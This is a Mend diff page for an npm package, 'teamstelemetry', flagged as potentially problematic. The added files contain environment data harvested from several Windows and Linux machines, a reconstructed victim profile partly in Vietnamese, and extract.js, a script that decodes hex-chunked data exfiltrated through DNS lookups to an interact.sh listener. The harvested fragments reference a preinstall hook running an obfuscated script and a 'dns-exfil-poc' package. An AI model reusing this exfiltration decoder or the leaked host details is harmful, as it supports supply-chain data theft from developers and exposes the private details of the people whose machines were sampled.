npm - teamstelemetry - Versions diffs - 0.0.1-security → 9.0.0 - Mend

teamstelemetry 0.0.1-security → 9.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of teamstelemetry might be problematic. Click here for more details.

Files changed (17) hide show

package/data2.txt ADDED Viewed

@@ -0,0 +1,478 @@
+h=DESKTOP-97KBB6H&u=justin&p=w
+h=5447c791a9dc&u=root&p=linux&
+{"ip":"192.168.36.131","u
+in32&w=desktop-97kbb6h\justin&
+w=root&e={"HOSTNAME":"5447c791
+sername":"kali","hostname
+e={"ALLUSERSPROFILE":"C:\\Prog
+a9dc","NODE":"/usr/bin/node","
+":"kali","platform":"linu
+ramData","APPDATA":"C:\\Users\
+x","arch":"arm64","home":
+\justin\\AppData\\Roaming","CO
+ain-dynamic","npm_config_metri
+"/home/kali","env":{"LESS
+LOR":"0","CommonProgramFiles":
+cs_registry":"http://mirrors.c
+_TERMCAP_se":"\u001b[0m",
+"C:\\Program Files\\Common Fil
+loud.tencent.com/npm/","npm_co
+"POWERSHELL_TELEMETRY_OPT
+es","CommonProgramFiles(x86)":
+nfig_global_prefix":"/usr/loca
+OUT":"1","npm_package_dev
+"C:\\Program Files (x86)\\Comm
+":"","LANGUAGE":"","USER"
+on Files","CommonProgramW6432"
+:"kali","LESS_TERMCAP_ue"
+:"C:\\Program Files\\Common Fi
+":"","npm_config_registry":"ht
+:"\u001b[0m","npm_config_
+les","COMPUTERNAME":"DESKTOP-9
+tp://mirrors.cloud.tencent.com
+user_agent":"npm/9.2.0 no
+/npm/","npm_config_local_prefi
+7KBB6H","ComSpec":"C:\\Windows
+de/v20.19.2 linux arm64 w
+\\system32\\cmd.exe","Detonati
+x":"/opt/hscan-supplychain-dyn
+orkspaces/false","XDG_SEA
+onLogFilePath":"D:\\TRANSFER\\
+amic","npm_config_python":"/us
+T":"seat0","DOTNET_CLI_TE
+ccb3928e-d757-f011-b01c-002248
+r/bin/python3","npm_config_glo
+LEMETRY_OPTOUT":"1","SSH_
+c1bef8\\output\\workflow.log",
+balconfig":"/usr/local/etc/npm
+AGENT_PID":"1667","XDG_SE
+"DetonationLogLevel":"Info","D
+SSION_TYPE":"x11","npm_no
+riverData":"C:\\Windows\\Syste
+_execpath":"/usr/lib/node_modu
+de_execpath":"/usr/bin/no
+m32\\Drivers\\DriverData","EDI
+les/npm/bin/npm-cli.js","npm_p
+de","npm_package_resolved
+ackage_integrity":"sha512-pygT
+TOR":"C:\\Windows\\notepad.exe
+ackage_integrity":"sha512-iW8o
+":"https://registry.npmjs
+","HOME":"C:\\Users\\justin","
+djkTnKVgBwM5yfNfccGrVNzj1LrpB9
+oxCIIRDNp6urNrcRe9aKhuqJlopPVq
+.org/show-dependencies/-/
+HOMEDRIVE":"C:","HOMEPATH":"\\
+7zWsQHqbQKnfKUYAy9G4F3jZroV4oG
+show-dependencies-99.9.2.
+Users\\justin","INIT_CWD":"D:\
+t+HnRmaQKlgxpg4EviuIHA==","PAT
+tgz","SHLVL":"1","XDG_CAC
+\TRANSFER\\ccb3928e-d757-f011-
+HE_HOME":"/home/kali/.cac
+b01c-002248c1bef8\\f75c927b-07
+amic/node_modules/title-depend
+he","npm_config_noproxy":
+4f-46c5-99ee-ab99ca8555ae","LO
+encies/node_modules/.bin:/opt/
+"","HOME":"/home/kali","O
+CALAPPDATA":"C:\\Users\\justin
+hscan-supplychain-dynamic/node
+LDPWD":"/opt/shares/tools
+\\AppData\\Local","LOGONSERVER
+_modules/node_modules/.bin:/op
+/SNMP-Brute","npm_package
+":"\\\\DESKTOP-97KBB6H","NODE"
+t/hscan-supplychain-dynamic/no
+an-supplychain-dynamic/node_mo
+_optional":"","DESKTOP_SE
+:"C:\\Program Files\\nodejs\\n
+de_modules/.bin:/opt/node_modu
+dules/.bin:/opt/node_modules/.
+SSION":"lightdm-xsession"
+ode.exe","NODE_EXE":"C:\\Progr
+les/.bin:/node_modules/.bin:/u
+,"npm_package_json":"/hom
+am Files\\nodejs\\\\node.exe",
+sr/lib/node_modules/npm/node_m
+b/node_modules/npm/node_module
+e/kali/Downloads/node_mod
+"NPM_CLI_JS":"C:\\Program File
+odules/@npmcli/run-script/lib/
+ules/show-dependencies/pa
+s\\nodejs\\\\node_modules\\npm
+node-gyp-bin:/usr/local/sbin:/
+ckage.json","PANEL_GDK_CO
+\\bin\\npm-cli.js","npm_comman
+usr/local/bin:/usr/sbin:/usr/b
+RE_DEVICE_EVENTS":"0","XD
+bin:/bin","npm_package_json":"
+d":"install","npm_config_cache
+in:/sbin:/bin","npm_package_js
+G_SEAT_PATH":"/org/freede
+":"C:\\Users\\justin\\AppData\
+on":"/opt/hscan-supplychain-dy
+sktop/DisplayManager/Seat
+\Local\\npm-cache","npm_config
+namic/node_modules/title-depen
+/node_modules/dns-exfil-poc/pa
+0","LESS_TERMCAP_so":"\u0
+_globalconfig":"C:\\Users\\jus
+dencies/package.json","_":"/us
+ckage.json","_":"/usr/bin/node
+01b[01;33m","npm_config_u
+tin\\AppData\\Roaming\\npm\\et
+r/bin/node","npm_config_userco
+serconfig":"/home/kali/.n
+ot/.npmrc","npm_config_init_mo
+c\\npmrc","npm_config_global_p
+nfig":"/root/.npmrc","npm_conf
+pmrc","npm_config_local_p
+refix":"C:\\Users\\justin\\App
+dule":"/root/.npm-init.js","np
+ig_init_module":"/root/.npm-in
+refix":"/home/kali/Downlo
+Data\\Roaming\\npm","npm_confi
+it.js","npm_command":"install"
+ads","npm_package_integri
+g_init_module":"C:\\Users\\jus
+pt/hscan-supplychain-dynamic/n
+,"PWD":"/opt/hscan-supplychain
+ty":"sha512-yzDZ00NNzlWdR
+tin\\.npm-init.js","npm_config
+ode_modules/dns-exfil-poc","np
+-dynamic/node_modules/title-de
+aS4g1IraXmiV+Qtk+/Z3Pq20h
+_local_prefix":"D:\\TRANSFER\\
+pendencies","npm_lifecycle_eve
+Y7/ERRbx6OmeZ8CZjq0WiLsGp
+ccb3928e-d757-f011-b01c-002248
+nt":"preinstall","EDITOR":"vi"
+","EDITOR":"vi","npm_package_n
+IXGe1T4CIzS9xDEAvsdsZlg==
+c1bef8\\f75c927b-074f-46c5-99e
+,"npm_package_name":"title-dep
+ame":"dns-exfil-poc","npm_conf
+","DBUS_SESSION_BUS_ADDRE
+e-ab99ca8555ae","npm_config_no
+endencies","npm_config_node_gy
+:/usr/bin:/sbin:/bin","ASPECT_
+SS":"unix:path=/run/user/
+de_gyp":"C:\\Program Files\\no
+p":"/usr/lib/node_modules/npm/
+dules/npm/node_modules/node-gy
+1000/bus","NMAP_PRIVILEGE
+dejs\\node_modules\\npm\\node_
+node_modules/node-gyp/bin/node
+p/bin/node-gyp.js","npm_packag
+D":"","GOROOT":"/home/kal
+modules\\node-gyp\\bin\\node-g
+-gyp.js","npm_package_dev":"",
+i/.go","COLORTERM":"truec
+yp.js","npm_config_noproxy":""
+"npm_package_version":"99.9.1"
+":"99.9.1","npm_package_resolv
+olor","COLOR":"1","COMMAN
+,"npm_config_npm_version":"10.
+ed":"http://mirrors.cloud.tenc
+,"npm_package_resolved":"http:
+D_NOT_FOUND_INSTALL_PROMP
+8.2","npm_config_prefix":"C:\\
+//mirrors.cloud.tencent.com/np
+T":"1","npm_config_metric
+Users\\justin\\AppData\\Roamin
+m/title-dependencies/-/title-d
+s-exfil-poc-99.9.1.tgz","HOME"
+s_registry":"https://regi
+g\\npm","npm_config_userconfig
+ependencies-99.9.1.tgz","HOME"
+:"/root","SHLVL":"2","npm_pack
+stry.npmjs.org/","QT_QPA_
+":"C:\\Users\\justin\\.npmrc",
+:"/root","SHLVL":"2","npm_pack
+PLATFORMTHEME":"qt5ct","L
+"npm_config_user_agent":"npm/1
+age_dev_optional":"","npm_conf
+ig_cache":"/root/.npm","npm_li
+OGNAME":"kali","QT_AUTO_S
+0.8.2 node/v18.20.6 win32 x64
+ig_cache":"/root/.npm","npm_li
+fecycle_script":"node app.obfu
+CREEN_SCALE_FACTOR":"0","
+workspaces/false","npm_execpat
+fecycle_script":"node app.obfu
+WINDOWID":"0","LESS_TERMC
+h":"C:\\Program Files\\nodejs\
+scated.js","npm_config_user_ag
+ent":"npm/8.19.2 node/v16.18.1
+AP_us":"\u001b[1;32m","_"
+\node_modules\\npm\\bin\\npm-c
+ent":"npm/8.19.2 node/v16.18.1
+ linux x64 workspaces/false","
+:"/usr/bin/npm","npm_conf
+li.js","npm_lifecycle_event":"
+ linux x64 workspaces/false","
+ig_prefix":"/usr/local","
+preinstall","npm_lifecycle_scr
+npm_node_execpath":"/usr/bin/n
+ode","npm_config_prefix":"/usr
+COLORFGBG":"15;0","XDG_SE
+ipt":"node app.obfuscated.js",
+ode","npm_config_prefix":"/usr
+/local"}
+SSION_CLASS":"user","TERM
+"npm_node_execpath":"C:\\Progr
+/local"}
+":"xterm-256color","XDG_S
+am Files\\nodejs\\node.exe","n
+ESSION_ID":"2","npm_confi
+pm_package_dev":"","npm_packag
+g_cache":"/home/kali/.npm
+e_dev_optional":"","npm_packag
+","npm_config_node_gyp":"
+e_integrity":"sha512-iW8ooxCII
+/usr/share/nodejs/node-gy
+RDNp6urNrcRe9aKhuqJlopPVq7zWsQ
+p/bin/node-gyp.js","PATH"
+HqbQKnfKUYAy9G4F3jZroV4oGt+HnR
+:"/home/kali/Downloads/no
+maQKlgxpg4EviuIHA==","npm_pack
+de_modules/show-dependenc
+age_json":"D:\\TRANSFER\\ccb39
+ies/node_modules/.bin:/ho
+28e-d757-f011-b01c-002248c1bef
+me/kali/Downloads/node_mo
+8\\f75c927b-074f-46c5-99ee-ab9
+dules/node_modules/.bin:/
+9ca8555ae\\node_modules\\title
+home/kali/Downloads/node_
+-dependencies\\package.json","
+modules/.bin:/home/kali/n
+npm_package_name":"title-depen
+ode_modules/.bin:/home/no
+dencies","npm_package_optional
+de_modules/.bin:/node_mod
+":"","npm_package_peer":"","np
+ules/.bin:/usr/share/node
+m_package_resolved":"file:D:\\
+js/@npmcli/run-script/lib
+TRANSFER\\ccb3928e-d757-f011-b
+/node-gyp-bin:/home/kali/
+01c-002248c1bef8\\upload0e26a1
+go/bin:/home/kali/.go/bin
+49ffa74e91a1315041eb4cdc3d.tgz
+:/home/kali/.local/bin:/h
+","npm_package_version":"99.9.
+ome/kali/bin:/usr/local/s
+1","NPM_PREFIX_JS":"C:\\Progra
+bin:/usr/sbin:/sbin:/usr/
+m Files\\nodejs\\\\node_module
+local/bin:/usr/bin:/bin:/
+s\\npm\\bin\\npm-prefix.js","N
+usr/local/games:/usr/game
+PM_PREFIX_NPM_CLI_JS":"C:\\Use
+s:/snap/bin","SESSION_MAN
+rs\\justin\\AppData\\Roaming\\
+AGER":"local/kali:@/tmp/.
+npm\\node_modules\\npm\\bin\\n
+ICE-unix/1576,unix/kali:/
+pm-cli.js","NUMBER_OF_PROCESSO
+tmp/.ICE-unix/1576","NODE
+RS":"2","OneDrive":"C:\\Users\
+":"/usr/bin/node","npm_pa
+\justin\\OneDrive","OS":"Windo
+ckage_name":"show-depende
+ws_NT","Path":"D:\\TRANSFER\\c
+ncies","XDG_MENU_PREFIX":
+cb3928e-d757-f011-b01c-002248c
+"xfce-","XDG_RUNTIME_DIR"
+1bef8\\f75c927b-074f-46c5-99ee
+:"/run/user/1000","XDG_SE
+-ab99ca8555ae\\node_modules\\t
+SSION_PATH":"/org/freedes
+itle-dependencies\\node_module
+ktop/DisplayManager/Sessi
+s\\.bin;D:\\TRANSFER\\ccb3928e
+on0","DISPLAY":":0.0","LA
+-d757-f011-b01c-002248c1bef8\\
+NG":"en_US.UTF-8","POWERS
+f75c927b-074f-46c5-99ee-ab99ca
+HELL_UPDATECHECK":"Off","
+8555ae\\node_modules\\node_mod
+XDG_CURRENT_DESKTOP":"XFC
+ules\\.bin;D:\\TRANSFER\\ccb39
+E","XAUTHORITY":"/home/ka
+28e-d757-f011-b01c-002248c1bef
+li/.Xauthority","XDG_CONF
+8\\f75c927b-074f-46c5-99ee-ab9
+IG_HOME":"/home/kali/.con
+9ca8555ae\\node_modules\\.bin;
+fig","XDG_SESSION_DESKTOP
+D:\\TRANSFER\\ccb3928e-d757-f0
+":"lightdm-xsession","LS_
+11-b01c-002248c1bef8\\node_mod
+COLORS":"rs=0:di=01;34:ln
+ules\\.bin;D:\\TRANSFER\\node_
+=01;36:mh=00:pi=40;33:so=
+modules\\.bin;D:\\node_modules
+01;35:do=01;35:bd=40;33;0
+\\.bin;C:\\Program Files\\node
+1:cd=40;33;01:or=40;31;01
+js\\node_modules\\npm\\node_mo
+:mi=00:su=37;41:sg=30;43:
+dules\\@npmcli\\run-script\\li
+ca=00:tw=30;42:ow=34;42:s
+b\\node-gyp-bin;C:\\Program Fi
+t=37;44:ex=01;32:*.7z=01;
+les\\PowerShell\\7;C:\\Windows
+31:*.ace=01;31:*.alz=01;3
+\\system32;C:\\Windows;C:\\Win
+1:*.apk=01;31:*.arc=01;31
+dows\\System32\\Wbem;C:\\Windo
+:*.arj=01;31:*.bz=01;31:*
+ws\\System32\\WindowsPowerShel
+.bz2=01;31:*.cab=01;31:*.
+l\\v1.0\\;C:\\Windows\\System3
+cpio=01;31:*.crate=01;31:
+2\\OpenSSH\\;C:\\Program Files
+*.deb=01;31:*.drpm=01;31:
+\\dotnet\\;C:\\Program Files\\
+*.dwm=01;31:*.dz=01;31:*.
+PowerShell\\7\\;C:\\Program Fi
+ear=01;31:*.egg=01;31:*.e
+les\\nodejs\\;C:\\Users\\justi
+sd=01;31:*.gz=01;31:*.jar
+n\\AppData\\Local\\Programs\\P
+=01;31:*.lha=01;31:*.lrz=
+ython\\Launcher\\;C:\\Users\\j
+01;31:*.lz=01;31:*.lz4=01
+ustin\\AppData\\Local\\Microso
+;31:*.lzh=01;31:*.lzma=01
+ft\\WindowsApps;C:\\Users\\jus
+;31:*.lzo=01;31:*.pyz=01;
+tin\\AppData\\Local\\Programs\
+31:*.rar=01;31:*.rpm=01;3
+\Microsoft VS Code\\bin;C:\\Us
+1:*.rz=01;31:*.sar=01;31:
+ers\\justin\\.dotnet\\tools;C:
+*.swm=01;31:*.t7z=01;31:*
+\\Users\\justin\\AppData\\Loca
+.tar=01;31:*.taz=01;31:*.
+l\\Programs\\Python\\Python312
+tbz=01;31:*.tbz2=01;31:*.
+\\;C:\\Users\\justin\\AppData\
+tgz=01;31:*.tlz=01;31:*.t
+\Local\\Programs\\Python\\Pyth
+xz=01;31:*.tz=01;31:*.tzo
+on312\\Scripts\\;C:\\Users\\ju
+=01;31:*.tzst=01;31:*.ude
+stin\\AppData\\Local\\Programs
+b=01;31:*.war=01;31:*.whl
+\\Python\\Python313\\;C:\\User
+=01;31:*.wim=01;31:*.xz=0
+s\\justin\\AppData\\Local\\Pro
+1;31:*.z=01;31:*.zip=01;3
+grams\\Python\\Python313\\Scri
+1:*.zoo=01;31:*.zst=01;31
+pts\\;C:\\Users\\justin\\AppDa
+:*.avif=01;35:*.jpg=01;35
+ta\\Roaming\\npm","PATHEXT":".
+:*.jpeg=01;35:*.jxl=01;35
+COM;.EXE;.BAT;.CMD;.VBS;.VBE;.
+:*.mjpg=01;35:*.mjpeg=01;
+JS;.JSE;.WSF;.WSH;.MSC;.CPL","
+35:*.gif=01;35:*.bmp=01;3
+POWERSHELL_DISTRIBUTION_CHANNE
+5:*.pbm=01;35:*.pgm=01;35
+L":"MSI:Windows 10 Enterprise"
+:*.ppm=01;35:*.tga=01;35:
+,"PROCESSOR_ARCHITECTURE":"AMD
+*.xbm=01;35:*.xpm=01;35:*
+64","PROCESSOR_IDENTIFIER":"AM
+.tif=01;35:*.tiff=01;35:*
+D64 Family 25 Model 1 Stepping
+.png=01;35:*.svg=01;35:*.
+ 1, AuthenticAMD","PROCESSOR_L
+svgz=01;35:*.mng=01;35:*.
+EVEL":"25","PROCESSOR_REVISION
+pcx=01;35:*.mov=01;35:*.m
+":"0101","ProgramData":"C:\\Pr
+pg=01;35:*.mpeg=01;35:*.m
+ogramData","ProgramFiles":"C:\
+2v=01;35:*.mkv=01;35:*.we
+\Program Files","ProgramFiles(
+bm=01;35:*.webp=01;35:*.o
+x86)":"C:\\Program Files (x86)
+gm=01;35:*.mp4=01;35:*.m4
+","ProgramW6432":"C:\\Program
+v=01;35:*.mp4v=01;35:*.vo
+Files","PROMPT":"$P$G","PSModu
+b=01;35:*.qt=01;35:*.nuv=
+lePath":"C:\\Users\\justin\\Do
+01;35:*.wmv=01;35:*.asf=0
+cuments\\PowerShell\\Modules;C
+1;35:*.rm=01;35:*.rmvb=01
+:\\Program Files\\PowerShell\\
+;35:*.flc=01;35:*.avi=01;
+Modules;c:\\program files\\pow
+35:*.fli=01;35:*.flv=01;3
+ershell\\7\\Modules;C:\\Progra
+5:*.gl=01;35:*.dl=01;35:*
+m Files\\WindowsPowerShell\\Mo
+.xcf=01;35:*.xwd=01;35:*.
+dules;C:\\Windows\\system32\\W
+yuv=01;35:*.cgm=01;35:*.e
+indowsPowerShell\\v1.0\\Module
+mf=01;35:*.ogv=01;35:*.og
+s","PUBLIC":"C:\\Users\\Public
+x=01;35:*.aac=00;36:*.au=
+","SystemDrive":"C:","SystemRo
+00;36:*.flac=00;36:*.m4a=
+ot":"C:\\Windows","TEMP":"C:\\
+00;36:*.mid=00;36:*.midi=
+Users\\justin\\AppData\\Local\
+00;36:*.mka=00;36:*.mp3=0
+\Temp","TMP":"C:\\Users\\justi
+0;36:*.mpc=00;36:*.ogg=00
+n\\AppData\\Local\\Temp","USER
+;36:*.ra=00;36:*.wav=00;3
+DOMAIN":"DESKTOP-97KBB6H","USE
+6:*.oga=00;36:*.opus=00;3
+RDOMAIN_ROAMINGPROFILE":"DESKT
+6:*.spx=00;36:*.xspf=00;3
+OP-97KBB6H","USERNAME":"justin
+6:*~=00;90:*#=00;90:*.bak
+","USERPROFILE":"C:\\Users\\ju
+=00;90:*.crdownload=00;90
+stin","windir":"C:\\Windows"}
+:*.dpkg-dist=00;90:*.dpkg
+-new=00;90:*.dpkg-old=00;
+90:*.dpkg-tmp=00;90:*.old
+=00;90:*.orig=00;90:*.par
+t=00;90:*.rej=00;90:*.rpm
+new=00;90:*.rpmorig=00;90
+:*.rpmsave=00;90:*.swp=00
+;90:*.tmp=00;90:*.ucf-dis
+t=00;90:*.ucf-new=00;90:*
+.ucf-old=00;90::ow=30;44:
+","npm_lifecycle_script":
+"node app.obfuscated.js",
+"SSH_AUTH_SOCK":"/tmp/ssh
+-Me80vsvuqpAu/agent.1666"
+,"XDG_GREETER_DATA_DIR":"
+/var/lib/lightdm/data/kal
+i","SHELL":"/usr/bin/zsh"
+,"GOPATH":"/home/kali/go"
+,"npm_package_version":"9
+9.9.2","npm_lifecycle_eve
+nt":"preinstall","GDMSESS
+ION":"lightdm-xsession","
+QT_ACCESSIBILITY":"1","LE
+SS_TERMCAP_mb":"\u001b[1;
+31m","npm_package_dev_opt
+ional":"","XDG_VTNR":"7",
+"LESS_TERMCAP_md":"\u001b
+[1;36m","npm_config_globa
+lconfig":"/etc/npmrc","np
+m_config_init_module":"/h
+ome/kali/.npm-init.js","n

package/data_collect.txt ADDED Viewed

@@ -0,0 +1,78 @@
+{
+    "ALLUSERSPROFILE": "C:\\ProgramData",
+    "APPDATA": "C:\\Users\\justin\\AppData\\Roaming",
+    "ComSpec": "C:\\Windows\\system32\\cmd.exe",
+    "COMPUTERNAME": "DESKTOP-97KBB6H",
+    "HOMEDRIVE": "C:",
+    "HOMEPATH": "\\Users\\justin",
+    "LOCALAPPDATA": "C:\\Users\\justin\\AppData\\Local",
+    "LOGONSERVER": "\\\\DESKTOP-97KBB6H",
+    "NUMBER_OF_PROCESSORS": "2",
+    "OS": "Windows_NT",
+    "Path": "D:\\TRANSFER\\...various node_modules\\.bin paths...;C:\\Program Files\\PowerShell\\7;C:\\Windows\\system32;...;C:\\Program Files\\dotnet\\;C:\\Users\\justin\\AppData\\Local\\Programs\\Microsoft VS Code\\bin;...",
+    "PROCESSOR_ARCHITECTURE": "AMD64",
+    "SystemDrive": "C:",
+    "SystemRoot": "C:\\Windows",
+    "TEMP": "C:\\Users\\justin\\AppData\\Local\\Temp",
+    "USERPROFILE": "C:\\Users\\justin",
+    "windir": "C:\\Windows"
+}
+{
+  "summary": "Thông tin được tái cấu trúc từ các mảnh dữ liệu bị rò rỉ, xác định hai môi trường hoạt động riêng biệt: một máy trạm Windows và một môi trường Linux (container).",
+  "windows_environment": {
+    "hostname": "DESKTOP-97KBB6H",
+    "username": "justin",
+    "os": "Windows 10 Enterprise",
+    "architecture": "AMD64",
+    "cpu": "AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD",
+    "ip_address": "192.168.0.25",
+    "environment_variables": {
+      "ALLUSERSPROFILE": "C:\\ProgramData",
+      "APPDATA": "C:\\Users\\justin\\AppData\\Roaming",
+      "ComSpec": "C:\\Windows\\system32\\cmd.exe",
+      "HOMEDRIVE": "C:",
+      "HOMEPATH": "\\Users\\justin",
+      "LOCALAPPDATA": "C:\\Users\\justin\\AppData\\Local",
+      "NUMBER_OF_PROCESSORS": "2",
+      "OS": "Windows_NT",
+      "Path": "D:\\TRANSFER\\...;C:\\Program Files\\PowerShell\\7;C:\\Windows\\system32;...;C:\\Users\\justin\\AppData\\Local\\Programs\\Microsoft VS Code\\bin;...",
+      "PROCESSOR_ARCHITECTURE": "AMD64",
+      "SystemRoot": "C:\\Windows",
+      "TEMP": "C:\\Users\\justin\\AppData\\Local\\Temp",
+      "USERPROFILE": "C:\\Users\\justin"
+    }
+  },
+  "linux_environment": {
+    "hostnames": [
+      "5447c791a9dc",
+      "b84007cf852a"
+    ],
+    "username": "root",
+    "platform": "linux",
+    "architecture": "x64",
+    "ip_addresses": [
+      "172.17.0.5",
+      "172.16.16.3"
+    ],
+    "working_directories": [
+      "/app",
+      "/opt/hscan-supplychain-dynamic"
+    ],
+    "tools": {
+      "editor": "vi",
+      "node_js_path": "/usr/bin/node"
+    }
+  },
+  "shared_configuration": {
+    "npm_registries": [
+      "http://mirrors.cloud.tencent.com/npm/",
+      "https://registry.npmjs.org/"
+    ],
+    "noteworthy_packages": [
+      "dns-exfil-poc",
+      "show-dependencies",
+      "title-dependencies"
+    ]
+  }
+}

package/extract.js ADDED Viewed

@@ -0,0 +1,113 @@
+const fs = require('fs');
+const path = require('path');
+// Tên tệp JSON bạn tải về từ Interact.sh
+const jsonExportFileName = 'interactsh-export.json';
+/**
+ * Hàm này quét chuỗi JSON bị lỗi và cố gắng trích xuất các cặp key-value đơn giản
+ * @param {string} brokenJsonString - Chuỗi JSON bị lỗi, không hoàn chỉnh
+ * @returns {object} - Một đối tượng chứa các dữ liệu đã được khôi phục
+ */
+function bestEffortParse(brokenJsonString) {
+    const recoveredData = {};
+    // Các trường đơn giản, quan trọng cần cứu trước
+    const simpleKeysToRecover = ['ip', 'username', 'hostname', 'platform', 'arch', 'home'];
+    console.log('\n--- BẮT ĐẦU CỨU DỮ LIỆU TỪNG PHẦN ---');
+    for (const key of simpleKeysToRecover) {
+        const regex = new RegExp(`"${key}"\\s*:\\s*"(.*?)"`, 'i');
+        const match = brokenJsonString.match(regex);
+        if (match && match[1]) {
+            recoveredData[key] = match[1];
+        }
+    }
+    // --- THAY ĐỔI QUAN TRỌNG: TỰ ĐỘNG TRÍCH XUẤT ENV ---
+    // Cố gắng tìm và trích xuất toàn bộ đối tượng "env"
+    const envMatch = brokenJsonString.match(/"env"\s*:\s*({.*?})/);
+    if (envMatch && envMatch[1]) {
+        try {
+            // Thử phân tích cú pháp riêng cho đối tượng env
+            recoveredData.env = JSON.parse(envMatch[1] + '}'); // Thêm dấu } để thử đóng đối tượng
+        } catch (e) {
+            // Nếu thất bại, chỉ hiển thị phần đã trích xuất được
+            recoveredData.env_partial = envMatch[1];
+        }
+    }
+    return recoveredData;
+}
+// --- Bắt đầu logic chính ---
+console.log('Bắt đầu giải mã dữ liệu...');
+try {
+    const jsonFilePath = path.join(__dirname, jsonExportFileName);
+    const fileContent = fs.readFileSync(jsonFilePath, 'utf8');
+    let interactData;
+    try {
+        const outerData = JSON.parse(fileContent);
+        interactData = typeof outerData.app === 'string' ? JSON.parse(outerData.app) : outerData;
+    } catch (e) {
+        interactData = JSON.parse(fileContent);
+    }
+    console.log(`Phát hiện tên miền gốc: ${interactData.host}`);
+    const chunks = {};
+    const dnsRequests = interactData.data.filter(req => req.protocol === 'dns');
+    const regex = new RegExp(`^(\\d+)\\.([0-9a-fA-F]+)`);
+    for (const request of dnsRequests) {
+        const fullId = request['full-id'] || '';
+        const match = fullId.match(regex);
+        if (match) {
+            chunks[parseInt(match[1], 10)] = match[2];
+        }
+    }
+    if (Object.keys(chunks).length === 0) {
+        throw new Error('Không trích xuất được mảnh dữ liệu nào từ tệp export.');
+    }
+    console.log(`✅ Đã xử lý ${Object.keys(chunks).length} mảnh dữ liệu.`);
+    // Sắp xếp và ghép lại thành chuỗi HEX đầy đủ
+    const sortedKeys = Object.keys(chunks).sort((a, b) => parseInt(a) - parseInt(b));
+    const fullHexString = sortedKeys.map(key => chunks[key]).join('');
+    // Giải mã chuỗi HEX thành chuỗi JSON (có thể bị lỗi)
+    const decodedJsonString = Buffer.from(fullHexString, 'hex').toString('utf8');
+    // Cố gắng phân tích chuỗi JSON đã giải mã
+    try {
+        const finalData = JSON.parse(decodedJsonString);
+        console.log('\n--- DỮ LIỆU ĐÃ GIẢI MÃ HOÀN CHỈNH ---');
+        console.log(JSON.stringify(finalData, null, 2));
+    } catch (jsonError) {
+        // Nếu thất bại, chuyển sang chế độ cứu dữ liệu
+        console.log('\n⚠️  Lỗi JSON (do mất gói tin). Chuyển sang chế độ cứu dữ liệu...');
+        const recovered = bestEffortParse(decodedJsonString);
+        console.log('\n--- KẾT QUẢ CỨU DỮ LIỆU ---');
+        if (Object.keys(recovered).length > 0) {
+            console.log(JSON.stringify(recovered, null, 2));
+        } else {
+            console.log('Không thể cứu được dữ liệu nào một cách tự động.');
+        }
+        console.log('\n--- DỮ LIỆU GỐC BỊ LỖI (để tham khảo) ---');
+        console.log(decodedJsonString);
+    }
+} catch (error) {
+    if (error.code === 'ENOENT') {
+        console.error(`\n❌ Lỗi: Không tìm thấy tệp '${jsonExportFileName}'.`);
+    } else {
+        console.error(`\n❌ Đã xảy ra lỗi nghiêm trọng:`, error.message);
+    }
+}